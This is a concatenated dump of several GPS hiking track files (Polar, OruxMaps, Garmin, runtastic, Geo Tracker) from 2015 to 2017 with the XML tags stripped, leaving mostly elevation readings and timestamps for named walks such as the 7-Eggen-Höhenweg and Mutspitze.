+1204.36459
+
+
+1214.78278
+
+
+1230.2255
+
+
+1237.64696
+
+
+1240.17802
+
+
+1275.58264
+
+
+1297.04646
+
+
+1313.84676
+
+
+1329.27552
+
+
+1350.13497
+
+
+1364.14695
+
+
+1387.14739
+
+
+1394.12419
+
+
+1416.64367
+
+
+1423.92242
+
+
+1443.29222
+
+
+1456.57622
+
+
+1463.15341
+
+
+1463.75358
+
+
+1465.89958
+
+
+1465.62732
+
+
+1471.10228
+
+
+1494.85086
+
+
+1517.44553
+
+
+1535.83912
+
+
+1542.47326
+
+
+1539.50739
+
+
+1556.96686
+
+
+1564.23667
+
+
+1583.06819
+
+
+1591.47857
+
+
+1610.10828
+
+
+1610.33172
+
+
+1626.70001
+
+
+1641.41581
+
+
+1719.19128
+
+
+1712.40624
+
+
+1709.4172
+
+
+1740.02139
+
+
+1748.32913
+
+
+1757.03634
+
+
+1775.18182
+
+
+1785.2161
+
+
+1803.86796
+
+
+1830.40062
+
+
+1846.90585
+
+
+1868.29841
+
+
+1871.42091
+
+
+1885.6176
+
+
+1943.30125
+
+
+1968.57261
+
+
+1971.71536
+
+
+1961.70555
+
+
+1975.65621
+
+
+1991.76978
+
+
+2000.5434
+
+
+2002.07228
+
+
+2007.37516
+
+
+2022.64264
+
+
+2033.97951
+
+
+2047.58328
+
+
+2062.77895
+
+
+2074.09415
+
+
+2093.61566
+
+
+2099.51138
+
+
+2105.81257
+
+
+2119.57224
+
+
+2132.60845
+
+
+2118.86563
+
+
+2162.37126
+
+
+2209.88382
+
+
+2209.55001
+
+
+2264.01609
+
+
+2315.46692
+
+
+2358.90867
+ "
+"
+
+
+
+Polar
+
+
+
+2016-07-08T10:01:34Z
+
+
+
+
+1320.0
+2016-07-08T10:01:35Z
+
+
+1320.0
+2016-07-08T10:02:00Z
+
+
+1348.0
+2016-07-08T10:02:28Z
+
+
+1331.0
+2016-07-08T10:04:08Z
+
+
+1331.0
+2016-07-08T10:04:37Z
+
+
+1335.0
+2016-07-08T10:05:28Z
+
+
+1338.0
+2016-07-08T10:06:20Z
+
+
+1339.0
+2016-07-08T10:06:51Z
+
+
+1347.0
+2016-07-08T10:12:50Z
+
+
+1354.0
+2016-07-08T10:13:41Z
+
+
+1359.0
+2016-07-08T10:14:22Z
+
+
+1365.0
+2016-07-08T10:15:20Z
+
+
+1383.0
+2016-07-08T10:17:19Z
+
+
+1419.0
+2016-07-08T10:20:37Z
+
+
+1486.0
+2016-07-08T10:26:24Z
+
+
+1516.0
+2016-07-08T10:29:47Z
+
+
+1544.0
+2016-07-08T10:32:31Z
+
+
+1556.0
+2016-07-08T10:33:32Z
+
+
+1584.0
+2016-07-08T10:37:00Z
+
+
+1599.0
+2016-07-08T10:40:38Z
+
+
+1626.0
+2016-07-08T10:43:00Z
+
+
+1645.0
+2016-07-08T10:44:55Z
+
+
+1654.0
+2016-07-08T10:45:58Z
+
+
+1687.0
+2016-07-08T10:49:47Z
+
+
+1725.0
+2016-07-08T10:54:11Z
+
+
+1750.0
+2016-07-08T10:58:54Z
+
+
+1761.0
+2016-07-08T10:59:37Z
+
+
+1831.0
+2016-07-08T11:10:29Z
+
+
+1851.0
+2016-07-08T11:13:05Z
+
+
+1875.0
+2016-07-08T11:15:40Z
+
+
+1915.0
+2016-07-08T11:20:08Z
+
+
+1927.0
+2016-07-08T11:21:25Z
+
+
+1967.0
+2016-07-08T11:24:58Z
+
+
+2011.0
+2016-07-08T11:31:34Z
+
+
+2061.0
+2016-07-08T11:36:28Z
+
+
+2082.0
+2016-07-08T11:38:40Z
+
+
+2119.0
+2016-07-08T11:42:26Z
+
+
+2134.0
+2016-07-08T11:45:08Z
+
+
+2161.0
+2016-07-08T11:49:02Z
+
+
+2178.0
+2016-07-08T11:51:51Z
+
+
+2187.0
+2016-07-08T11:54:11Z
+
+
+2218.0
+2016-07-08T11:57:26Z
+
+
+2249.0
+2016-07-08T12:01:49Z
+
+
+2272.0
+2016-07-08T12:06:38Z
+
+
+2293.0
+2016-07-08T12:09:13Z
+
+
+2313.0
+2016-07-08T12:11:03Z
+
+
+2331.0
+2016-07-08T12:14:07Z
+
+
+2338.0
+2016-07-08T12:15:27Z
+
+
+2353.0
+2016-07-08T12:17:09Z
+
+
+2371.0
+2016-07-08T12:19:55Z
+
+
+2409.0
+2016-07-08T12:24:01Z
+
+
+2398.0
+2016-07-08T12:26:46Z
+
+
+2395.0
+2016-07-08T12:28:32Z
+
+
+2408.0
+2016-07-08T12:30:04Z
+
+
+2418.0
+2016-07-08T12:31:22Z
+
+
+2429.0
+2016-07-08T12:32:30Z
+
+
+2410.0
+2016-07-08T12:40:32Z
+
+
+2403.0
+2016-07-08T12:43:08Z
+
+
+2463.0
+2016-07-08T12:48:34Z
+ "
+"
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+ "
+"
+
+
+
+Polar
+
+
+
+2016-11-25T10:08:15Z
+
+
+
+
+926.0
+2016-11-25T10:08:31Z
+
+
+942.0
+2016-11-25T10:11:16Z
+
+
+947.0
+2016-11-25T10:12:11Z
+
+
+976.0
+2016-11-25T10:14:16Z
+
+
+989.0
+2016-11-25T10:15:35Z
+
+
+1005.0
+2016-11-25T10:16:58Z
+
+
+1018.0
+2016-11-25T10:17:45Z
+
+
+1024.0
+2016-11-25T10:18:26Z
+
+
+1059.0
+2016-11-25T10:21:12Z
+
+
+1071.0
+2016-11-25T10:22:21Z
+
+
+1128.0
+2016-11-25T10:26:46Z
+
+
+1139.0
+2016-11-25T10:27:43Z
+
+
+1152.0
+2016-11-25T10:28:59Z
+
+
+1176.0
+2016-11-25T10:30:39Z
+
+
+1251.0
+2016-11-25T10:36:25Z
+
+
+1285.0
+2016-11-25T10:38:52Z
+
+
+1289.0
+2016-11-25T10:39:06Z
+
+
+1301.0
+2016-11-25T10:40:02Z
+
+
+1316.0
+2016-11-25T10:41:09Z
+
+
+1324.0
+2016-11-25T10:41:43Z
+
+
+1333.0
+2016-11-25T10:42:21Z
+
+
+1343.0
+2016-11-25T10:43:12Z
+
+
+1349.0
+2016-11-25T10:43:47Z
+
+
+1355.0
+2016-11-25T10:44:42Z
+
+
+1360.0
+2016-11-25T10:44:58Z
+
+
+1369.0
+2016-11-25T10:45:25Z
+
+
+1386.0
+2016-11-25T10:46:52Z
+
+
+1398.0
+2016-11-25T10:48:02Z
+
+
+1406.0
+2016-11-25T10:48:31Z
+
+
+1411.0
+2016-11-25T10:48:52Z
+
+
+1429.0
+2016-11-25T10:50:18Z
+
+
+1463.0
+2016-11-25T10:53:59Z
+
+
+1496.0
+2016-11-25T10:57:31Z
+
+
+1515.0
+2016-11-25T10:59:07Z
+
+
+1531.0
+2016-11-25T11:00:14Z
+
+
+1534.0
+2016-11-25T11:01:26Z
+
+
+1543.0
+2016-11-25T11:02:21Z
+
+
+1543.0
+2016-11-25T11:03:07Z
+
+
+1586.0
+2016-11-25T11:07:00Z
+
+
+1601.0
+2016-11-25T11:08:46Z
+
+
+1620.0
+2016-11-25T11:10:57Z
+
+
+1639.0
+2016-11-25T11:12:59Z
+
+
+1650.0
+2016-11-25T11:14:45Z
+
+
+1657.0
+2016-11-25T11:15:44Z
+
+
+1680.0
+2016-11-25T11:19:19Z
+
+
+1715.0
+2016-11-25T11:22:51Z
+
+
+1720.0
+2016-11-25T11:23:29Z
+
+
+1734.0
+2016-11-25T11:24:36Z
+
+
+1741.0
+2016-11-25T11:25:30Z
+
+
+1767.0
+2016-11-25T11:27:45Z
+
+
+1782.0
+2016-11-25T11:29:01Z
+ "
+"
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+ "
+"
+
+
+gardiole
+
+
+
+
+
+OruxMaps
+2016-03-31T12:32:46Z
+
+
+gardiole
+<h1>OruxMaps</h1><br /><hr align=""center"" width=""480"" style=""height: 2px; width: 517px""/><h2>Name: gardiole</h2><br /><p>Startzeit: 03/31/2016 14:32</p><p>Zielzeit: 03/31/2016 15:59</p><p>Strecke: 5,9km (01:26)</p><p>Bewegungszeit: 01:17</p><p>Ø-Geschwindigkeit: 4,1km/h</p><p>Netto-Geschwindigkeit: 4,6km/h</p><p>Max. Geschwindigkeit: 7,2km/h</p><p>Minimale Höhe: 110m</p><p>Maximale Höhe: 231m</p><p>Steig-Geschw.: 343,9m/h</p><p>Sink-Geschw.: -357,5m/h</p><p>Aufstieg: 216m</p><p>Abstieg: -240m</p><p>Steigzeit: 00:37</p><p>Sinkzeit: 00:40</p><hr align=""center"" width=""480"" style=""height: 2px; width: 517px""/>
+
+Unbestimmt
+
+
+
+
+
+178.01
+2016-03-31T12:32:47Z
+
+
+188.8
+2016-03-31T12:32:52Z
+
+
+160.19
+2016-03-31T12:33:53Z
+
+
+161.07
+2016-03-31T12:34:26Z
+
+
+159.72
+2016-03-31T12:38:30Z
+
+
+202.68
+2016-03-31T12:43:51Z
+
+
+213.57
+2016-03-31T12:45:47Z
+
+
+216.33
+2016-03-31T12:46:17Z
+
+
+219.69
+2016-03-31T12:47:44Z
+
+
+221.69
+2016-03-31T12:48:12Z
+
+
+223.69
+2016-03-31T12:49:22Z
+
+
+223.56
+2016-03-31T12:50:37Z
+
+
+225.19
+2016-03-31T12:51:19Z
+
+
+224.1
+2016-03-31T12:52:21Z
+
+
+224.57
+2016-03-31T12:52:59Z
+
+
+230.16
+2016-03-31T12:54:12Z
+
+
+231.68
+2016-03-31T12:54:32Z
+
+
+226.83
+2016-03-31T12:56:13Z
+
+
+220.32
+2016-03-31T12:56:58Z
+
+
+219.82
+2016-03-31T12:57:59Z
+
+
+216.7
+2016-03-31T12:58:54Z
+
+
+214.22
+2016-03-31T13:00:05Z
+
+
+211.85
+2016-03-31T13:00:34Z
+
+
+212.66
+2016-03-31T13:03:00Z
+
+
+193.72
+2016-03-31T13:05:24Z
+
+
+194.7
+2016-03-31T13:06:13Z
+
+
+188.45
+2016-03-31T13:06:53Z
+
+
+185.13
+2016-03-31T13:07:56Z
+
+
+159.78
+2016-03-31T13:10:04Z
+
+
+153.63
+2016-03-31T13:11:10Z
+
+
+133.69
+2016-03-31T13:12:54Z
+
+
+110.57
+2016-03-31T13:15:04Z
+
+
+120.4
+2016-03-31T13:16:20Z
+
+
+142.69
+2016-03-31T13:18:58Z
+
+
+144.19
+2016-03-31T13:20:01Z
+
+
+144.19
+2016-03-31T13:21:58Z
+
+
+147.09
+2016-03-31T13:22:40Z
+
+
+150.02
+2016-03-31T13:23:41Z
+
+
+154.19
+2016-03-31T13:24:40Z
+
+
+163.16
+2016-03-31T13:25:55Z
+
+
+168.66
+2016-03-31T13:27:30Z
+
+
+167.25
+2016-03-31T13:28:11Z
+
+
+190.2
+2016-03-31T13:31:09Z
+
+
+195.22
+2016-03-31T13:32:26Z
+
+
+202.78
+2016-03-31T13:33:28Z
+
+
+209.19
+2016-03-31T13:35:30Z
+
+
+215.35
+2016-03-31T13:37:42Z
+
+
+217.19
+2016-03-31T13:38:56Z
+
+
+216.72
+2016-03-31T13:39:28Z
+
+
+218.26
+2016-03-31T13:42:10Z
+
+
+216.09
+2016-03-31T13:44:20Z
+
+
+220.68
+2016-03-31T13:45:09Z
+
+
+222.66
+2016-03-31T13:45:45Z
+
+
+224.67
+2016-03-31T13:46:02Z
+
+
+224.85
+2016-03-31T13:46:28Z
+
+
+221.59
+2016-03-31T13:47:18Z
+
+
+222.2
+2016-03-31T13:47:43Z
+
+
+220.36
+2016-03-31T13:48:45Z
+
+
+223.2
+2016-03-31T13:49:48Z
+
+
+217.67
+2016-03-31T13:51:08Z
+
+
+217.18
+2016-03-31T13:51:34Z
+
+
+216.29
+2016-03-31T13:52:10Z
+
+
+205.6
+2016-03-31T13:53:30Z
+
+
+186.22
+2016-03-31T13:55:14Z
+
+
+172.22
+2016-03-31T13:56:27Z
+
+
+160.82
+2016-03-31T13:57:27Z
+
+
+156.7
+2016-03-31T13:58:51Z
+
+
+154.59
+2016-03-31T13:59:38Z
+ "
+"
+
+
+13_ago_2016_11_21_41_AM.gpx
+
+Registrato da Geo Tracker per Android di Ilya Bogdanovich
+
+
+
+
+13 ago 2016 11:21:41 AM
+
+
+
+622.0
+2016-08-13T09:22:33Z
+
+
+675.0
+2016-08-13T09:26:49Z
+
+
+681.0
+2016-08-13T09:27:31Z
+
+
+689.0
+2016-08-13T09:27:57Z
+
+
+704.0
+2016-08-13T09:30:06Z
+
+
+697.0
+2016-08-13T09:30:27Z
+
+
+757.0
+2016-08-13T09:32:02Z
+
+
+743.0
+2016-08-13T09:33:51Z
+
+
+750.0
+2016-08-13T09:35:52Z
+
+
+768.0
+2016-08-13T09:38:48Z
+
+
+763.0
+2016-08-13T09:41:33Z
+
+
+800.0
+2016-08-13T09:43:11Z
+
+
+801.0
+2016-08-13T09:43:41Z
+
+
+823.0
+2016-08-13T09:45:03Z
+
+
+837.0
+2016-08-13T09:48:52Z
+
+
+813.0
+2016-08-13T10:04:41Z
+
+
+813.0
+2016-08-13T10:07:47Z
+
+
+814.0
+2016-08-13T10:08:34Z
+
+
+819.0
+2016-08-13T10:12:17Z
+
+
+812.0
+2016-08-13T10:13:36Z
+
+
+811.0
+2016-08-13T10:16:52Z
+
+
+806.0
+2016-08-13T10:17:22Z
+
+
+789.0
+2016-08-13T10:18:13Z
+
+
+779.0
+2016-08-13T10:19:33Z
+
+
+764.0
+2016-08-13T10:21:33Z
+
+
+758.0
+2016-08-13T10:22:29Z
+
+
+736.0
+2016-08-13T10:26:06Z
+
+
+715.0
+2016-08-13T10:27:38Z
+
+
+712.0
+2016-08-13T10:28:14Z
+
+
+685.0
+2016-08-13T10:30:10Z
+
+
+684.0
+2016-08-13T10:31:44Z
+
+
+658.0
+2016-08-13T10:34:09Z
+
+
+650.0
+2016-08-13T10:35:28Z
+
+
+638.0
+2016-08-13T10:38:25Z
+
+
+#fbaf00
+#1 "
+"
+
+
+
+
+
+
+Garmin Connect
+2015-09-19T07:49:16Z
+
+7-Eggen-Höhenweg
+
+
+
+936.2000122070312
+2015-09-19T07:49:16Z
+
+
+939.7999877929688
+2015-09-19T07:50:30Z
+
+
+944.4000244140625
+2015-09-19T07:51:25Z
+
+
+951.0
+2015-09-19T07:52:10Z
+
+
+974.2000122070312
+2015-09-19T07:58:10Z
+
+
+1000.2000122070312
+2015-09-19T08:03:54Z
+
+
+1011.7999877929688
+2015-09-19T08:05:28Z
+
+
+1013.2000122070312
+2015-09-19T08:05:53Z
+
+
+1026.800048828125
+2015-09-19T08:07:49Z
+
+
+1031.199951171875
+2015-09-19T08:13:20Z
+
+
+1045.199951171875
+2015-09-19T08:15:50Z
+
+
+1060.800048828125
+2015-09-19T08:16:52Z
+
+
+1069.4000244140625
+2015-09-19T08:19:32Z
+
+
+1068.800048828125
+2015-09-19T08:22:04Z
+
+
+1061.4000244140625
+2015-09-19T08:23:48Z
+
+
+1060.5999755859375
+2015-09-19T08:24:57Z
+
+
+1026.0
+2015-09-19T08:28:31Z
+
+
+1001.5999755859375
+2015-09-19T08:37:58Z
+
+
+1008.5999755859375
+2015-09-19T08:39:48Z
+
+
+1021.5999755859375
+2015-09-19T08:42:32Z
+
+
+1017.2000122070312
+2015-09-19T08:45:34Z
+
+
+1002.4000244140625
+2015-09-19T08:51:49Z
+
+
+978.7999877929688
+2015-09-19T08:56:03Z
+
+
+976.5999755859375
+2015-09-19T08:56:45Z
+
+
+979.0
+2015-09-19T08:57:05Z
+
+
+977.0
+2015-09-19T08:57:35Z
+
+
+987.4000244140625
+2015-09-19T09:08:15Z
+
+
+983.5999755859375
+2015-09-19T09:24:23Z
+
+
+987.7999877929688
+2015-09-19T09:27:55Z
+
+
+1003.7999877929688
+2015-09-19T09:31:01Z
+
+
+998.4000244140625
+2015-09-19T09:32:57Z
+
+
+1000.5999755859375
+2015-09-19T09:33:53Z
+
+
+996.4000244140625
+2015-09-19T09:34:59Z
+
+
+999.4000244140625
+2015-09-19T09:35:52Z
+
+
+991.5999755859375
+2015-09-19T09:39:35Z
+
+
+1000.2000122070312
+2015-09-19T09:44:35Z
+
+
+1003.7999877929688
+2015-09-19T09:46:40Z
+
+
+998.5999755859375
+2015-09-19T09:47:38Z
+
+
+1000.0
+2015-09-19T09:48:20Z
+
+
+993.7999877929688
+2015-09-19T09:54:39Z
+
+
+987.0
+2015-09-19T10:43:44Z
+
+
+966.5999755859375
+2015-09-19T10:50:02Z
+
+
+961.0
+2015-09-19T10:50:43Z
+
+
+957.4000244140625
+2015-09-19T10:51:12Z
+
+
+962.5999755859375
+2015-09-19T10:52:23Z
+
+
+958.4000244140625
+2015-09-19T10:54:00Z
+
+
+968.4000244140625
+2015-09-19T10:57:01Z
+
+
+990.5999755859375
+2015-09-19T11:00:31Z
+
+
+991.0
+2015-09-19T11:03:32Z
+
+
+936.2000122070312
+2015-09-19T11:08:08Z
+
+
+902.7999877929688
+2015-09-19T11:11:44Z
+
+
+899.2000122070312
+2015-09-19T11:15:05Z
+
+
+877.5999755859375
+2015-09-19T11:19:43Z
+
+
+864.5999755859375
+2015-09-19T11:23:24Z
+
+
+846.5999755859375
+2015-09-19T11:26:20Z
+
+
+832.5999755859375
+2015-09-19T11:29:08Z
+
+
+817.2000122070312
+2015-09-19T11:31:35Z
+
+
+781.0
+2015-09-19T11:34:53Z
+
+
+772.2000122070312
+2015-09-19T11:35:26Z
+
+
+765.2000122070312
+2015-09-19T11:35:59Z
+
+
+758.0
+2015-09-19T11:37:52Z
+ "
+"
+
+
+
+
+
+
+Garmin International
+2017-07-30T16:55:45Z
+
+
+2017-07-30 14:37:08 001
+
+
+
+
+
+
+1453.49
+2017-07-30T09:52:13Z
+
+
+1436.32
+2017-07-30T09:54:58Z
+
+
+1436.57
+2017-07-30T09:56:40Z
+
+
+1417.0
+2017-07-30T09:59:05Z
+
+
+1407.69
+2017-07-30T09:59:38Z
+
+
+1403.0
+2017-07-30T09:59:57Z
+
+
+1375.91
+2017-07-30T10:04:03Z
+
+
+1331.71
+2017-07-30T10:07:18Z
+
+
+1328.72
+2017-07-30T10:10:00Z
+
+
+1303.85
+2017-07-30T10:13:34Z
+
+
+1287.66
+2017-07-30T10:16:00Z
+
+
+1277.08
+2017-07-30T10:17:06Z
+
+
+1268.62
+2017-07-30T10:18:54Z
+
+
+1252.37
+2017-07-30T10:21:44Z
+
+
+1240.64
+2017-07-30T10:23:43Z
+
+
+1231.92
+2017-07-30T10:26:54Z
+
+
+1209.08
+2017-07-30T10:31:29Z
+
+
+1227.9
+2017-07-30T10:36:05Z
+
+
+1218.12
+2017-07-30T10:40:01Z
+
+
+1207.35
+2017-07-30T10:40:45Z
+
+
+1199.09
+2017-07-30T10:41:21Z
+
+
+1157.09
+2017-07-30T10:44:52Z
+
+
+1150.13
+2017-07-30T10:45:36Z
+
+
+1142.82
+2017-07-30T10:46:20Z
+
+
+1139.39
+2017-07-30T10:48:52Z
+
+
+1139.28
+2017-07-30T10:50:03Z
+
+
+1134.67
+2017-07-30T10:51:17Z
+
+
+1130.37
+2017-07-30T10:52:15Z
+
+
+1135.31
+2017-07-30T10:56:45Z
+
+
+1106.13
+2017-07-30T10:58:42Z
+
+
+1097.97
+2017-07-30T11:00:18Z
+
+
+1046.27
+2017-07-30T11:03:03Z
+
+
+1024.6
+2017-07-30T11:04:52Z
+
+
+1019.57
+2017-07-30T11:05:22Z
+
+
+1004.39
+2017-07-30T11:06:21Z
+
+
+989.29
+2017-07-30T11:07:31Z
+
+
+963.46
+2017-07-30T11:10:11Z
+
+
+949.01
+2017-07-30T11:12:20Z
+
+
+946.77
+2017-07-30T11:12:37Z
+
+
+925.67
+2017-07-30T11:16:30Z
+
+
+918.56
+2017-07-30T11:17:20Z
+
+
+904.49
+2017-07-30T11:18:56Z
+
+
+892.43
+2017-07-30T11:20:03Z
+
+
+892.18
+2017-07-30T11:20:49Z
+
+
+891.83
+2017-07-30T11:21:42Z
+
+
+891.51
+2017-07-30T11:23:03Z
+
+
+890.24
+2017-07-30T11:24:11Z
+
+
+889.91
+2017-07-30T11:25:17Z
+
+
+887.68
+2017-07-30T11:26:02Z
+
+
+885.79
+2017-07-30T11:26:19Z
+
+
+866.54
+2017-07-30T11:28:55Z
+
+
+851.49
+2017-07-30T11:30:29Z
+
+
+846.3
+2017-07-30T11:31:22Z
+
+
+822.38
+2017-07-30T11:33:29Z
+
+
+817.96
+2017-07-30T11:34:03Z
+
+
+810.65
+2017-07-30T11:35:04Z
+
+
+806.53
+2017-07-30T11:35:31Z
+
+
+801.85
+2017-07-30T11:36:04Z
+
+
+790.71
+2017-07-30T11:37:19Z
+
+
+785.01
+2017-07-30T11:38:00Z
+
+
+780.84
+2017-07-30T11:38:45Z
+
+
+777.16
+2017-07-30T11:39:56Z
+
+
+773.03
+2017-07-30T11:40:57Z
+
+
+766.71
+2017-07-30T11:42:27Z
+
+
+760.9
+2017-07-30T11:43:46Z
+
+
+759.76
+2017-07-30T11:44:13Z
+
+
+757.94
+2017-07-30T11:45:01Z
+
+
+754.05
+2017-07-30T11:46:19Z
+
+
+739.54
+2017-07-30T11:53:54Z
+ "
+"
+
+
+
+
+
+
+Garmin International
+2015-10-05T17:43:59Z
+
+
+Corona dei Pinci
+
+
+
+
+
+
+918.3671875
+
+
+932.09375
+
+
+923.30078125
+
+
+926.05859375
+
+
+953.4765625
+
+
+952.9453125
+
+
+967.05078125
+
+
+983.84375
+
+
+1003.25
+
+
+1032.82421875
+
+
+1045.6171875
+
+
+1045.66015625
+
+
+1048.94140625
+
+
+1067.15234375
+
+
+1076.29296875
+
+
+1087.2734375
+
+
+1124.4140625
+
+
+1193.30078125
+
+
+1215.24609375
+
+
+1239.13671875
+
+
+1263.73046875
+
+
+1261.6640625
+
+
+1244.2734375
+
+
+1229.52734375
+
+
+1232.12109375
+
+
+1221.8203125
+
+
+1213.68359375
+
+
+1195.0703125
+
+
+1185.0625
+
+
+1184.984375
+
+
+1164.30859375
+
+
+1167.015625
+
+
+1134.390625
+
+
+1136.765625
+
+
+1124.34765625
+
+
+1100.16796875
+
+
+1081.8515625
+
+
+1071.125
+
+
+1058.33984375
+
+
+1049.82421875
+
+
+1033.484375
+
+
+1016.9140625
+
+
+1000.52734375
+
+
+989.67578125
+
+
+987.16015625
+
+
+952.375
+
+
+935.72265625
+
+
+921.20703125
+
+
+909.046875
+
+
+911.375
+ "
+"
+
+
+
+
+
+
+
+2016-05-05 16:41:22
+
+
+
+357.75
+
+
+357.27
+
+
+360.63
+
+
+364.48
+
+
+401.97
+
+
+416.39
+
+
+431.29
+
+
+454.36
+
+
+461.57
+
+
+479.35
+
+
+593.75
+
+
+786.02
+
+
+786.98
+
+
+799.47
+
+
+803.8
+
+
+800.92
+
+
+802.36
+
+
+786.02
+
+
+797.55
+
+
+824.47
+
+
+840.33
+
+
+859.08
+
+
+857.15
+
+
+850.42
+
+
+845.14
+
+
+842.73
+
+
+855.71
+
+
+858.59
+
+
+861.0
+
+
+851.87
+
+
+853.31
+
+
+855.23
+
+
+852.83
+
+
+847.54
+
+
+848.98
+
+
+844.66
+
+
+852.35
+
+
+851.38
+
+
+849.94
+
+
+850.9
+
+
+846.1
+
+
+844.18
+
+
+842.73
+
+
+840.81
+
+
+833.6
+
+
+823.51
+
+
+819.18
+
+
+804.28
+
+
+800.44
+
+
+801.4
+
+
+799.47
+
+
+798.03
+
+
+786.02
+
+
+781.69
+
+
+776.88
+
+
+772.56
+
+
+748.52
+
+
+744.2
+
+
+738.43
+
+
+731.22
+
+
+725.93
+
+
+716.8
+
+
+661.52
+
+
+654.31
+
+
+642.78
+
+
+629.8
+
+
+606.73
+
+
+602.88
+
+
+613.46
+
+
+612.98
+
+
+614.9
+
+
+618.26
+
+
+617.78
+
+
+616.34
+
+
+612.5
+
+
+605.77
+
+
+605.29
+
+
+582.22
+
+
+569.72
+
+
+559.62
+
+
+548.57
+
+
+530.3
+
+
+504.35
+
+
+477.43
+
+
+466.38
+
+
+459.65
+
+
+457.24
+
+
+454.84
+
+
+448.11
+
+
+445.23
+
+
+443.79
+
+
+442.34
+
+
+439.94
+
+
+433.21
+
+
+432.73
+
+
+433.21
+ "
+"
+
+
+
+
+
+2016
+http://www.runtastic.com
+
+runtastic
+2016-01-17T14:28:08Z
+
+
+Visit this link to view this activity on runtastic.com
+
+
+539.0
+2016-01-17T14:28:08Z
+
+
+541.0
+2016-01-17T14:28:50Z
+
+
+542.0
+2016-01-17T14:29:18Z
+
+
+546.0
+2016-01-17T14:29:56Z
+
+
+550.0
+2016-01-17T14:31:06Z
+
+
+567.0
+2016-01-17T14:33:12Z
+
+
+576.0
+2016-01-17T14:35:46Z
+
+
+573.0
+2016-01-17T14:37:46Z
+
+
+586.0
+2016-01-17T14:38:06Z
+
+
+576.0
+2016-01-17T14:42:15Z
+
+
+581.0
+2016-01-17T14:43:43Z
+
+
+574.0
+2016-01-17T14:44:09Z
+
+
+592.0
+2016-01-17T14:47:11Z
+
+
+588.0
+2016-01-17T14:49:17Z
+
+
+592.0
+2016-01-17T14:51:03Z
+
+
+595.0
+2016-01-17T14:53:21Z
+
+
+589.0
+2016-01-17T14:55:15Z
+
+
+587.0
+2016-01-17T14:56:41Z
+
+
+587.0
+2016-01-17T15:01:23Z
+
+
+587.0
+2016-01-17T15:03:30Z
+
+
+583.0
+2016-01-17T15:04:59Z
+
+
+583.0
+2016-01-17T15:05:29Z
+
+
+598.0
+2016-01-17T15:08:37Z
+
+
+613.0
+2016-01-17T15:10:43Z
+
+
+613.0
+2016-01-17T15:13:06Z
+
+
+619.0
+2016-01-17T15:13:58Z
+
+
+626.0
+2016-01-17T15:14:32Z
+
+
+616.0
+2016-01-17T15:15:10Z
+
+
+636.0
+2016-01-17T15:17:00Z
+
+
+625.0
+2016-01-17T15:17:46Z
+
+
+627.0
+2016-01-17T15:19:24Z
+
+
+643.0
+2016-01-17T15:21:05Z
+
+
+638.0
+2016-01-17T15:22:30Z
+
+
+657.0
+2016-01-17T15:23:52Z
+
+
+663.0
+2016-01-17T15:24:58Z
+
+
+638.0
+2016-01-17T15:26:06Z
+
+
+645.0
+2016-01-17T15:26:20Z
+
+
+657.0
+2016-01-17T15:27:10Z
+
+
+660.0
+2016-01-17T15:28:40Z
+
+
+652.0
+2016-01-17T15:29:06Z
+
+
+651.0
+2016-01-17T15:30:00Z
+
+
+648.0
+2016-01-17T15:31:04Z
+
+
+645.0
+2016-01-17T15:31:28Z
+
+
+622.0
+2016-01-17T15:32:20Z
+
+
+630.0
+2016-01-17T15:34:15Z
+
+
+631.0
+2016-01-17T15:34:57Z
+
+
+635.0
+2016-01-17T15:35:39Z
+
+
+612.0
+2016-01-17T15:36:15Z
+
+
+593.0
+2016-01-17T15:36:59Z
+
+
+581.0
+2016-01-17T15:38:34Z
+
+
+584.0
+2016-01-17T15:39:48Z
+
+
+582.0
+2016-01-17T15:40:40Z
+
+
+574.0
+2016-01-17T15:41:48Z
+
+
+570.0
+2016-01-17T15:42:08Z
+
+
+575.0
+2016-01-17T15:42:38Z
+
+
+569.0
+2016-01-17T15:44:00Z
+
+
+566.0
+2016-01-17T15:45:43Z
+
+
+561.0
+2016-01-17T15:46:17Z
+
+
+552.0
+2016-01-17T15:47:29Z
+
+
+558.0
+2016-01-17T15:49:14Z
+
+
+566.0
+2016-01-17T15:50:00Z
+
+
+566.0
+2016-01-17T15:51:48Z
+
+
+565.0
+2016-01-17T15:52:32Z
+
+
+568.0
+2016-01-17T15:53:55Z
+
+
+558.0
+2016-01-17T15:54:15Z
+
+
+557.0
+2016-01-17T15:55:05Z
+
+
+532.0
+2016-01-17T15:56:55Z
+ "
+"
+
+
+
+
+
+
+2017-01-03T15:37:23Z
+
+
+Mutspitze Teil 3
+
+
+
+718.0
+2017-01-03T15:37:23Z
+
+
+
+
+0.000000
+
+717.0
+2017-01-03T15:38:02Z
+
+
+
+
+3.112118
+
+698.0
+2017-01-03T15:39:30Z
+
+
+
+
+12.122971
+
+687.0
+2017-01-03T15:40:19Z
+
+
+
+
+12.135834
+
+676.0
+2017-01-03T15:41:37Z
+
+
+
+
+3.671173
+
+662.0
+2017-01-03T15:43:00Z
+
+
+
+
+3.697571
+
+648.0
+2017-01-03T15:44:15Z
+
+
+
+
+11.624756
+
+637.0
+2017-01-03T15:45:39Z
+
+
+
+
+2.026062
+
+635.0
+2017-01-03T15:46:19Z
+
+
+
+
+17.006958
+
+635.0
+2017-01-03T15:46:42Z
+
+
+
+
+2.593079
+
+637.0
+2017-01-03T16:03:04Z
+
+
+
+
+17.039490
+
+637.0
+2017-01-03T16:03:13Z
+
+
+
+
+7.784790
+
+633.0
+2017-01-03T16:04:36Z
+
+
+
+
+11.284851
+
+624.0
+2017-01-03T16:05:32Z
+
+
+
+
+0.989563
+
+613.0
+2017-01-03T16:06:27Z
+
+
+
+
+13.613892
+
+595.0
+2017-01-03T16:09:29Z
+
+
+
+
+1.245117
+
+586.0
+2017-01-03T16:10:45Z
+
+
+
+
+11.436890
+
+562.0
+2017-01-03T16:14:18Z
+
+
+
+
+3.340332
+
+545.0
+2017-01-03T16:16:53Z
+
+
+
+
+13.034668 "
+"
+
+
+
+
+
+
+
